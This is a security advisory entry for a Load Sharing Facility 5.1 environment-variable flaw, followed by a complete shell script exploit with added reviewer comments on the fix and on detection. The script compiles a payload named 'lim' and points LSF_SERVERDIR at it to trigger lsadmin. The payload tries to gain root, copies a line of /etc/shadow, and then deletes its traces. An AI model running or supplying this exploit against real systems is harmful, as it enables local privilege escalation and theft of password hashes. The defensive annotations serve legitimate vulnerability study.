source: https://www.securityfocus.com/bid/7655/info
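It has been reported that Load Sharing Facility (LSF) does not properly handle input supplied in environment variables. As a result, a local attacker may be able to gain escalated privileges on a vulnerable system. In the proof of concept below, the variable involved is LSF_SERVERDIR: it is pointed at the current directory before lsadmin is run.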
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!
#
# Reviewer notes (defensive reading of this listing):
# - The untrusted input is the LSF_SERVERDIR environment variable. The script
#   sets it to the current directory, places a binary named "lim" there, and
#   then runs "lsadmin ckconfig"; it relies on lsadmin starting that "lim".
# - NOTE(review): privilege is only gained if lsadmin itself runs with elevated
#   rights (for example installed setuid root). The listing does not show how
#   lsadmin is installed - confirm on the affected host.
# - Fix class: a privileged helper must not locate the programs it executes via
#   a caller-controlled environment variable; it should use a fixed, trusted
#   path or discard the caller's environment before resolving it.
# - Interim hardening to evaluate: drop the elevated permission bits from
#   lsadmin where unprivileged users do not need it, and apply the vendor fix
#   referenced by the advisory at the source URL.

# Step 1: write the payload source. Everything up to __END__ is emitted
# verbatim into attacker_code.c (the delimiter is unquoted, but the text holds
# no shell expansions). The program calls setuid(0)/setgid(0), then copies the
# first line of /etc/shadow (fgets with a limit of 120, so at most 119
# characters) into .temp.file in the working directory. None of the return
# values are checked, so the setuid()/setgid() calls have no effect when it is
# started without privilege.
cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

# Step 2: build the payload under the name "lim" - presumably the helper name
# lsadmin looks up inside LSF_SERVERDIR (inferred from this script; verify
# against the LSF installation).
gcc attacker_code.c -o lim
# Mode 777: readable, writable and executable by every user.
chmod 777 lim
# Step 3: point LSF_SERVERDIR at the current directory. This is the
# environment-variable input the advisory says is not handled properly.
export LSF_SERVERDIR=.
# Step 4: trigger. Detection idea: audit executions of lsadmin whose
# environment carries an LSF_SERVERDIR other than the installed server
# directory, and executions of a "lim" binary located outside that directory.
lsadmin ckconfig
# Step 5: show the result. A line from /etc/shadow appearing here would mean
# the payload ran with enough privilege to read that file.
cat .temp.file
# Step 6: delete the source, the binary and the output file. Because the
# on-disk artifacts are removed, detection should rely on process/exec
# auditing rather than on leftover files.
rm -f attacker_code.c lim .temp.file